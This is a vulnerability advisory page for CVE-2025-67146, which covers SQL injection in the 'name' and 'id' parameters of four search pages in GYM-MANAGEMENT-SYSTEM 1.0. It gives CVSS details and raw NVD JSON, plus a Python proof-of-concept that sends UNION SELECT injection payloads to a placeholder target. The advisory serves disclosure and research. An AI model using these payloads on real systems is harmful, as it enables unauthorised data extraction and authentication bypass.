Security Vulnerability Report
中文
CVE-2025-67146 CVSS 9.4 CRITICAL

CVE-2025-67146

Published: 2026-01-12 22:16:08
Last Modified: 2026-01-27 20:22:15

Description

Multiple SQL Injection vulnerabilities exist in AbhishekMali21 GYM-MANAGEMENT-SYSTEM 1.0 via the 'name' parameter in (1) member_search.php, (2) trainer_search.php, and (3) gym_search.php, and via the 'id' parameter in (4) payment_search.php. An unauthenticated remote attacker can exploit these issues to inject malicious SQL commands, leading to unauthorized data extraction, authentication bypass, or modification of database contents.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:abhishekmali21:gym_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
GYM-MANAGEMENT-SYSTEM 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target = "http://target.com/GYM-MANAGEMENT-SYSTEM" # SQL Injection PoC for member_search.php payload_member = "' OR 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" url_member = f"{target}/member_search.php?name={payload_member}" # SQL Injection PoC for trainer_search.php payload_trainer = "' OR 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" url_trainer = f"{target}/trainer_search.php?name={payload_trainer}" # SQL Injection PoC for gym_search.php payload_gym = "' OR 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" url_gym = f"{target}/gym_search.php?name={payload_gym}" # SQL Injection PoC for payment_search.php payload_payment = "1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" url_payment = f"{target}/payment_search.php?id={payload_payment}" def test_sqli(url, param_name): try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[+] Possible SQL Injection found in {param_name}") print(f"[+] URL: {url}") return True except Exception as e: print(f"[-] Error: {e}") return False # Test all endpoints test_sqli(url_member, "member_search.php?name") test_sqli(url_trainer, "trainer_search.php?name") test_sqli(url_gym, "gym_search.php?name") test_sqli(url_payment, "payment_search.php?id")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67146", "sourceIdentifier": "[email protected]", "published": "2026-01-12T22:16:07.797", "lastModified": "2026-01-27T20:22:14.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple SQL Injection vulnerabilities exist in AbhishekMali21 GYM-MANAGEMENT-SYSTEM 1.0 via the 'name' parameter in (1) member_search.php, (2) trainer_search.php, and (3) gym_search.php, and via the 'id' parameter in (4) payment_search.php. An unauthenticated remote attacker can exploit these issues to inject malicious SQL commands, leading to unauthorized data extraction, authentication bypass, or modification of database contents."}, {"lang": "es", "value": "Múltiples vulnerabilidades de inyección SQL existen en AbhishekMali21 GYM-MANAGEMENT-SYSTEM 1.0 a través del parámetro 'name' en (1) member_search.php, (2) trainer_search.php y (3) gym_search.php, y a través del parámetro 'id' en (4) payment_search.php. Un atacante remoto no autenticado puede explotar estos problemas para inyectar comandos SQL maliciosos, lo que lleva a la extracción no autorizada de datos, omisión de autenticación o la modificación del contenido de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:abhishekmali21:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8DE6DCE3-2E0F-4E03-BA74-F6C333DF4968"}]}]}], "references": [{"url": "https://github.com/AbhishekMali21/GYM-MANAGEMENT-SYSTEM/issues/4", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}